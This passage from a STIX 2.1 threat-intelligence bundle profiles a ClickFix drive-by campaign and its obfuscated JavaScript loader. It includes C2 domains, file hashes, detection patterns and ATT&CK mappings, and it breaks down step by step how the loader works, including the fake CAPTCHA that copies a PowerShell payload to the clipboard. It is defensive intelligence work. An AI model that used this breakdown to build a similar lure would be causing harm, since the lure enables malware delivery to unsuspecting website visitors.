      "source_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
      "target_ref": "attack-pattern--24a98d95-0ecc-42a1-adae-3124fc5af164"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--683c953a-3ca1-4e9a-a955-0018e3da6fb5",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
      "target_ref": "attack-pattern--10ec9dcd-f7f1-4e00-aea2-f48b8236eaf4"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--77882769-bd05-4642-8181-8754bada72c8",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
      "target_ref": "attack-pattern--e3492bdf-28a4-4651-861c-84b205b1c740"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--26ef64c3-6106-415c-8820-3c80bac3d45c",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
      "target_ref": "attack-pattern--008b5d30-4100-44e2-9557-79307c836574"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4efcf276-b503-4865-9597-84ebd0bb6424",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
      "target_ref": "attack-pattern--7f8e5085-ed68-42b9-9056-b395331f9096"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--85370973-876c-417c-9060-006b4874ff3a",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
      "target_ref": "attack-pattern--83552909-7093-498f-bd03-51fa30e434db"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ebe8848e-4cb8-4bd1-ba09-9c8fc0e2b44d",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
      "target_ref": "attack-pattern--8e3f00c4-508d-403b-a1e6-ef8dbfa69ddf"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6b680118-1fd4-42e8-a5c7-2f1fc9f260e9",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
      "target_ref": "attack-pattern--20faa53e-ad48-4eb3-86da-f3bffcdc490b"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d409bd31-0b75-4611-994c-fe22e142066e",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
      "target_ref": "attack-pattern--2115dee5-998e-44fd-a87f-af914112a548"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6a85f10c-5a97-44b2-a2d7-86333f73bba4",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
      "target_ref": "attack-pattern--4221a565-d330-4a37-b682-bd8afea876b6"
    },
    {
      "type": "threat-actor",
      "spec_version": "2.1",
      "id": "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "TDS Cluster \u2014 AS202412 / ntdnewtds infrastructure (V3 / May 6 build)",
      "description": "Same threat cluster as SL-ADV-007 V1/V2. This May 6 build (V3) predates both. Shares core TTPs: window.__performance_optimizer_v6 guard, synchronous XHR to TDS endpoints, document.createElement('script') injection into document.head, setInterval debugger trap at 4000ms, Function.constructor sandbox escape probe. V3 is the most feature-complete variant observed: includes a full production-grade multilingual ClickFix lure engine supporting 50+ languages with per-locale UI strings, localStorage-based deduplication, Shadow DOM overlay rendering, 240-second auto-dismiss timer, and window.addEventListener message-channel communication. TDS endpoints use /jsrepo path (as V1) with same cache-busting pattern.",
      "threat_actor_types": [
        "criminal",
        "financially-motivated"
      ],
      "sophistication": "advanced",
      "resource_level": "individual",
      "primary_motivation": "financial-gain",
      "aliases": [
        "AS202412 TDS Actor",
        "SL-ADV-007 cluster"
      ],
      "labels": [
        "clickfix",
        "tds",
        "multilingual",
        "shadow-dom",
        "infostealer"
      ]
    },
    {
      "type": "campaign",
      "spec_version": "2.1",
      "id": "campaign--165c2be8-c4d6-4389-9a30-88d5d589f88f",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "SL-ADV-007-V3: TDS Cluster \u2014 Earliest Build (May 6), Full ClickFix Lure Engine",
      "description": "May 6 build of the SL-ADV-007 TDS cluster. Full self-contained ClickFix engine with Shadow DOM overlay, 50-language support, localStorage/cookie victim tracking, and 240-second auto-dismiss. RC4+Base64 obfuscation throughout (17,914 strings). Predates V1 and V2. Establishes the baseline capability set for the cluster.",
      "first_seen": "2026-05-06T00:00:00Z",
      "last_seen": "2026-05-06T00:00:00Z",
      "labels": [
        "clickfix",
        "shadow-dom",
        "multilingual",
        "tds",
        "v3",
        "earliest"
      ]
    },
    {
      "type": "malware",
      "spec_version": "2.1",
      "id": "malware--1e5b20ef-8419-4d22-b0c1-60dbdb82bba3",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "TDS Stage-1 JS Loader + ClickFix Lure Engine \u2014 Variant 3 (May 6 build)",
      "description": "Earliest observed variant in the SL-ADV-007 cluster. Dated May 6 2026. 829,828 bytes. 3,272 lines (post dead-code removal). Single combined file: TDS loader + full ClickFix lure engine in one payload. \n\nCIPHER: RC4+Base64 via _0x5656 decoder. String array _0x59bb: 17,914 entries. Rotation offset: 311,002. Base offset: -196. \n\nSTRUCTURE:\n- Lines 1-8: file header / semicolon\n- Lines 2-144: string array _0x59bb (17,914 encoded entries)\n- Line 9: array rotation bootstrap IIFE (_0x59bb, 311002)\n- Line 145: decoder function _0x5656 (RC4+Base64)\n- Lines 316-399: anti-debug IIFE (calls _0x49af34 integrity checker)\n- Lines 400-644: once-wrapper factory _0x5374df + console-override anti-debug\n- Lines 645-3197: main ClickFix lure engine IIFE (2,553 lines)\n  - Lines 646-2194: config dictionary (150+ encoded string properties)\n  - Lines 2133-2194: 50-language localization map (en/es/fr/de/ru/zh/ja/pt/it/nl/pl/tr/ar/uk/vi/ko/ro/th/hu/cs/sv/no/da/fi/he/id/ms/sk/sr/hr/lt/lv/et/el/fa/ur/bg/az/sq/ka/hy/mk/kk/uz/ps/am/sw/ha/yo/ig/mn/lo/si/ta/te/kn/ml/pa/gu/or)\n  - Lines 2195-2199: document body/head style manipulation (opacity/padding/margin reset)\n  - Lines 2200-3197: payload functions:\n    _0x466e6: localStorage dedup check + document.referrer fingerprint\n    _0x27ea40: DOM element creator for overlay\n    _0x121d95: language detector (navigator.language \u2192 locale lookup)\n    _0x5397f8: TDS XHR caller (XMLHttpRequest GET /jsrepo?rnd=, synchronous, 3 endpoints)\n    _0x4fe5d4: Script injector (createElement('script'), .text=responseText, head.appendChild)\n    _0x50e295: Shadow DOM overlay builder (creates host element, attachShadow, builds CAPTCHA UI)\n    _0x587964: ClickFix lure renderer (per-locale strings, fake Cloudflare branding, clipboard.writeText)\n    _0x33532a: setTimeout 240000ms auto-dismiss (removes overlay after 4 min)\n    _0x3a8acb: Cookie setter + localStorage persistence (marks victim as seen)\n    _0x3b6d88: DOM cleanup + setTimeout removal handler\n    _0x194b13: window.addEventListener message-channel handler\n    _0x110bc6: Entry point / orchestrator\n- Lines 3198-3220: constructor escape + setInterval(_0x12b9ec, 4000) debugger trap\n- Lines 3221-3271: _0x12b9ec debugger trap function\n\n\nKEY BEHAVIOURS:\n1. Checks window.__performance_optimizer_v6 guard\n2. Checks localStorage key (dedup \u2014 won't re-show to already-seen victims)\n3. Checks document.referrer for fingerprinting\n4. Fires synchronous XHR to TDS /jsrepo endpoint, injects response as script\n5. Detects navigator.language, looks up per-locale UI strings from 50-lang map\n6. Builds Shadow DOM host element, attaches shadow root\n7. Renders fake Cloudflare CAPTCHA overlay with locale-correct text\n8. On user interaction: clipboard.writeText(PowerShell_payload)\n9. Sets cookie + localStorage to mark victim as seen\n10. Sets 240-second auto-dismiss timer on overlay\n11. Registers window message-channel listener for inter-frame comms\n",
      "malware_types": [
        "trojan",
        "dropper"
      ],
      "is_family": false,
      "labels": [
        "tds",
        "clickfix",
        "stage1",
        "rc4-b64",
        "shadow-dom",
        "multilingual",
        "50-languages",
        "localStorage",
        "v3",
        "earliest-build"
      ],
      "architecture_execution_envs": [
        "browser"
      ],
      "implementation_languages": [
        "javascript"
      ],
      "capabilities": [
        "anti-debugging",
        "anti-vm",
        "remote-code-execution",
        "obfuscated-payloads",
        "user-interface-spoofing"
      ]
    },
    {
      "type": "note",
      "spec_version": "2.1",
      "id": "note--77653f1f-5659-4737-9088-663c4f944ab2",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "abstract": "V3 is the May 6 earliest build \u2014 cluster timeline reconstruction",
      "content": "Chronological ordering of the SL-ADV-007 cluster based on file dates and feature delta:\n\nV3 (stuff2.js, May 6): Earliest. Full ClickFix lure engine embedded, 17,914 string entries, Shadow DOM overlay, 50-language localization, localStorage+cookie victim tracking, 3-endpoint TDS via /jsrepo. Most feature-complete lure UI. Fully obfuscated.\n\nV1 (god-help-me.js/stuff.js, ~May 12-18): Standalone loader only. 39,565 string entries (larger array, likely more evasion code). /jsrepo path. 2 TDS endpoints. 4 anti-debug layers. No lure UI included \u2014 lure fetched from TDS.\n\nV2 (stuff1.js, ~May 18): Cleartext loader, bundle-prepend delivery. /teamrepo path. 3 TDS endpoints (sdntds.shop added). 758 string entries (anti-debug only). Loader deliberately deobfuscated \u2014 operator may have determined cleartext loader is harder to detect than a 1MB obfuscated blob.\n\nEvolution pattern: V3\u2192V1\u2192V2 shows loader-lure separation (V1 offloads lure to TDS), infrastructure expansion (new domain in V2), and delivery sophistication increase (bundle hijack in V2). The 50-language lure in V3 was likely stripped out into the TDS-served second stage by V1/V2 to reduce injected payload size.\n\nShared fingerprints across all 3: window.__performance_optimizer_v6, synchronous XHR + createElement('script') + .text + head.appendChild, Math.random() cache-buster, setInterval(trap, 4000), Function.constructor('return this') escape, RC4+Base64 cipher, _0x59bb/_0x490f array fn names.",
      "object_refs": [
        "malware--1e5b20ef-8419-4d22-b0c1-60dbdb82bba3",
        "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--72208d1e-6df5-4090-90e0-a9649a04eca4",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "ntdnewtds.shop \u2014 Primary TDS C2 (all variants)",
      "description": "Primary TDS endpoint shared across V1, V2, V3. V1/V3 use /jsrepo path; V2 uses /teamrepo.",
      "infrastructure_types": [
        "command-and-control"
      ],
      "labels": [
        "tds",
        "c2",
        "shared",
        "ntdnewtds",
        "all-variants"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--4746914e-fdfb-4255-9157-0ce196797500",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "dnsnewtds.shop \u2014 Fallback TDS C2 (all variants)",
      "description": "Fallback TDS endpoint shared across V1, V2, V3.",
      "infrastructure_types": [
        "command-and-control"
      ],
      "labels": [
        "tds",
        "c2",
        "shared",
        "dnsnewtds",
        "all-variants"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--9e6c793a-8388-4297-8ed2-4474c868f335",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "File: stuff2.js \u2014 V3 May-6 build (829,828 bytes)",
      "description": "Earliest observed SL-ADV-007 variant. Full ClickFix engine + TDS loader, 3,272 lines, 17,914 string array entries.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[file:hashes.MD5 = 'c67211d946c6762bbef2afdb74c63416' OR file:hashes.'SHA-1' = 'dcfb29698a73656e60a329274ecc5833f92517ad' OR file:hashes.'SHA-256' = '1d9d37f90fa60b93647a845ff39f64ff7e7f71f6f2a576780fbe974064a907b1']",
      "pattern_type": "stix",
      "valid_from": "2026-05-06T00:00:00.000Z",
      "labels": [
        "v3",
        "may-6",
        "file-hash",
        "earliest-build"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--187c8ef4-e9bf-4100-822e-894f0193b30f",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "Domain: ntdnewtds.shop (all variants)",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[domain-name:value = 'ntdnewtds.shop']",
      "pattern_type": "stix",
      "valid_from": "2026-05-06T00:00:00.000Z",
      "labels": [
        "tds",
        "c2",
        "shared"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b25b0d59-610b-4479-8152-ad8d430393e6",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "Domain: dnsnewtds.shop (all variants)",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[domain-name:value = 'dnsnewtds.shop']",
      "pattern_type": "stix",
      "valid_from": "2026-05-06T00:00:00.000Z",
      "labels": [
        "tds",
        "c2",
        "shared"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--06ebe711-e144-41c8-b6ed-976a9b5049fc",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "URL pattern: /jsrepo?rnd= (V1 + V3)",
      "description": "TDS payload delivery path shared between V1 and V3. V2 uses /teamrepo.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[url:value MATCHES '^https?://(ntd|dns)newtds\\.shop/jsrepo\\?rnd=']",
      "pattern_type": "stix",
      "valid_from": "2026-05-06T00:00:00.000Z",
      "labels": [
        "tds",
        "jsrepo",
        "v1",
        "v3"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--47cce175-2625-4713-aa42-5b7bfa35ed01",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "JS artifact: window.__performance_optimizer_v6 guard (all variants)",
      "description": "Shared deduplication guard present across V1, V2, V3. Strong attribution indicator.",
      "indicator_types": [
        "malicious-activity",
        "anomalous-activity"
      ],
      "pattern": "[file:content MATCHES '__performance_optimizer_v6']",
      "pattern_type": "stix",
      "valid_from": "2026-05-06T00:00:00.000Z",
      "labels": [
        "shared-ioc",
        "all-variants",
        "attribution",
        "dedup-guard"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--13f0aada-9f92-48db-a400-084ec547cb57",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "Behaviour: localStorage dedup key + cookie persistence (V3-specific)",
      "description": "V3 writes a localStorage key after showing overlay to prevent re-display to the same victim. Also sets document.cookie with expiry. Enables victim tracking across sessions.",
      "indicator_types": [
        "malicious-activity",
        "anomalous-activity"
      ],
      "pattern": "[network-traffic:dst_ref.type = 'domain-name']",
      "pattern_type": "stix",
      "valid_from": "2026-05-06T00:00:00.000Z",
      "labels": [
        "victim-tracking",
        "localStorage",
        "cookie",
        "v3"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--eecca675-f1c7-4c72-b8c9-bf481b1e767c",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "Behaviour: Shadow DOM overlay for ClickFix CAPTCHA rendering (V3)",
      "description": "V3 builds CAPTCHA lure UI inside a Shadow DOM host element (attachShadow). This isolates the malicious overlay from page CSS and makes DOM inspection harder. Auto-dismisses after 240,000ms (4 minutes). Registers window.addEventListener for message-channel inter-frame comms.",
      "indicator_types": [
        "malicious-activity",
        "anomalous-activity"
      ],
      "pattern": "[file:content MATCHES 'attachShadow']",
      "pattern_type": "stix",
      "valid_from": "2026-05-06T00:00:00.000Z",
      "labels": [
        "shadow-dom",
        "v3",
        "clickfix-overlay",
        "evasion"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--9f4605b2-917e-4844-b228-26c8e2659e4c",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "Behaviour: 50-language localization map in ClickFix lure (V3)",
      "description": "V3 contains a full 50+ language localization dictionary (en/es/fr/de/ru/zh/ja/pt/it/nl/pl/tr/ar/uk/vi/ko/ro/th/hu/cs/sv/no/da/fi/he/id/ms/sk/sr/hr/lt/lv/et/el/fa/ur/bg/az/sq/ka/hy/mk/kk/uz/ps/am/sw/ha/yo/ig/mn/lo/si/ta/te/kn/ml/pa/gu/or). navigator.language used for locale detection. Indicates global targeting ambition.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[file:content MATCHES 'navigator.language']",
      "pattern_type": "stix",
      "valid_from": "2026-05-06T00:00:00.000Z",
      "labels": [
        "multilingual",
        "50-languages",
        "global-targeting",
        "v3",
        "clickfix"
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5552b4e5-d69a-4def-b51d-15f7e14deaef",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "T1059.007 \u2014 Command and Scripting Interpreter: JavaScript",
      "description": "V3 is a fully JS-implemented TDS loader + ClickFix lure engine. Synchronous XHR fires at page load; response injected as inline script into document.head.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1059/007",
          "external_id": "T1059.007"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--06a150f4-ffa1-47e4-beb4-7cc91f50c537",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "T1027 \u2014 Obfuscated Files or Information",
      "description": "RC4+Base64 cipher via _0x5656 decoder. 17,914-entry string array (_0x59bb), rotation 311,002, base offset -196. Largest string array in the observed cluster.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1027",
          "external_id": "T1027"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--114e81d2-b996-4d5f-a9b1-d55e78b79aa8",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "T1027.010 \u2014 Command Obfuscation",
      "description": "All TDS endpoint URLs, DOM method names, CSS properties, locale strings encoded. No plaintext strings survive in V3 (unlike V2 cleartext loader).",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1027/010",
          "external_id": "T1027.010"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4dab7fa0-6671-4954-bbf8-78df78f4f939",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "T1497.001 \u2014 Virtualization/Sandbox Evasion: System Checks",
      "description": "setInterval(_0x12b9ec, 4000) debugger trap + Function.constructor('return this') escape. Separate anti-debug IIFE at line 316 calls _0x49af34 integrity checker. Once-wrapper factory _0x5374df for console-override layer.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1497/001",
          "external_id": "T1497.001"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--f3f3c056-4cf8-469e-8ea2-3529b7c656ad",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "T1189 \u2014 Drive-by Compromise",
      "description": "Injected into compromised WordPress sites serving cannabis/dispensary content.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1189",
          "external_id": "T1189"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--365dbf0a-4202-4c24-9205-4e8455a93a55",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "T1203 \u2014 Exploitation for Client Execution",
      "description": "Shadow DOM fake Cloudflare CAPTCHA overlay. clipboard.writeText(PowerShell_payload). User executes via Win+R \u2192 paste \u2192 OK. Locale-aware lure text for 50+ languages.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1203",
          "external_id": "T1203"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--bf614ebf-b976-44e2-ab21-869b2d5108cc",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "T1566.002 \u2014 Phishing: Spearphishing Link",
      "description": "Victims arrive organically or are lured to compromised dispensary sites.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1566/002",
          "external_id": "T1566.002"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3c2812fc-e9a1-4ae8-bf5a-9e1c5398cdb9",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "T1140 \u2014 Deobfuscate/Decode Files or Information",
      "description": "All strings decoded at runtime via RC4+Base64. TDS URLs decoded via atob() calls within decoded strings.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1140",
          "external_id": "T1140"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--905c00c3-d29c-45ae-a260-c7fad3edeea8",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "T1104 \u2014 Multi-Stage Channels",
      "description": "TDS 3-endpoint fallback chain: ntdnewtds.shop \u2192 dnsnewtds.shop \u2192 third endpoint (encoded). Synchronous XHR GET /jsrepo?rnd= with Math.random() cache-buster.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1104",
          "external_id": "T1104"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--821c74bc-675b-45a3-a335-865f1199c00d",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "T1185 \u2014 Browser Session Hijacking (Victim Tracking)",
      "description": "V3 stores victim-seen state in both localStorage key and document.cookie with expiry. Prevents repeat overlay display \u2014 indicates concern for victim experience / re-targeting logic.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1185",
          "external_id": "T1185"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--b9f4edaa-4e36-491a-a2da-9e915da92c16",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "T1539 \u2014 Steal Web Session Cookie",
      "description": "Reading and writing document.cookie as part of victim-state tracking.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1539",
          "external_id": "T1539"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--73d46035-d53f-43ac-a23e-1587e08a7c43",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "T1608.002 \u2014 Stage Capabilities: Upload Tool",
      "description": "Remote JS second-stage payload hosted at TDS /jsrepo endpoint, served on-demand.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1608/002",
          "external_id": "T1608.002"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--69a5272e-3422-400a-b74b-d74877c3b104",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "T1055.001 \u2014 Process Injection via delivered PS payload",
      "description": "Downstream PowerShell chain injects TR/Rozena.Gen into svchost.exe (as documented in SL-ADV-007 V1 callchain).",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1055/001",
          "external_id": "T1055.001"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--14a84e74-560c-4703-962e-c072ae2213f7",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd",
      "target_ref": "malware--1e5b20ef-8419-4d22-b0c1-60dbdb82bba3"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--642b4f61-d89f-4198-ae67-05ff9b91d4da",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "controls",
      "source_ref": "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd",
      "target_ref": "infrastructure--72208d1e-6df5-4090-90e0-a9649a04eca4"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--93ad75f8-bd6c-41e5-a1f9-7a1c3d61269c",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "controls",
      "source_ref": "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd",
      "target_ref": "infrastructure--4746914e-fdfb-4255-9157-0ce196797500"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--48554838-3e7f-40eb-98ab-4a90b13f8d8f",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "communicates-with",
      "source_ref": "malware--1e5b20ef-8419-4d22-b0c1-60dbdb82bba3",
      "target_ref": "infrastructure--72208d1e-6df5-4090-90e0-a9649a04eca4"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8ae42d1e-a1f1-4bd5-934f-2a49578eaea7",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "communicates-with",
      "source_ref": "malware--1e5b20ef-8419-4d22-b0c1-60dbdb82bba3",
      "target_ref": "infrastructure--4746914e-fdfb-4255-9157-0ce196797500"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--653b6fea-cfbf-4c97-966f-1d8c2b2eb920",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--9e6c793a-8388-4297-8ed2-4474c868f335",
      "target_ref": "malware--1e5b20ef-8419-4d22-b0c1-60dbdb82bba3"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bd29716c-e762-4928-9307-0209edc5b473",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--187c8ef4-e9bf-4100-822e-894f0193b30f",
      "target_ref": "infrastructure--72208d1e-6df5-4090-90e0-a9649a04eca4"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--890c4688-4018-4b9b-853c-eed71012e0bf",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--b25b0d59-610b-4479-8152-ad8d430393e6",
      "target_ref": "infrastructure--4746914e-fdfb-4255-9157-0ce196797500"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b4c08bc4-c7cf-4732-8450-1baaf00ea3cb",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--06ebe711-e144-41c8-b6ed-976a9b5049fc",
      "target_ref": "malware--1e5b20ef-8419-4d22-b0c1-60dbdb82bba3"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--78ba5691-d7fd-47ec-8a7f-cbac5b5234c6",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--47cce175-2625-4713-aa42-5b7bfa35ed01",
      "target_ref": "malware--1e5b20ef-8419-4d22-b0c1-60dbdb82bba3"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
